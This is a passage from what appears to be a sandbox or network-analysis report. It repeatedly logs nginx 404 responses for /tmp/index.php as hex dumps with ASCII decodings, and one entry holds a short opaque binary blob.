75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 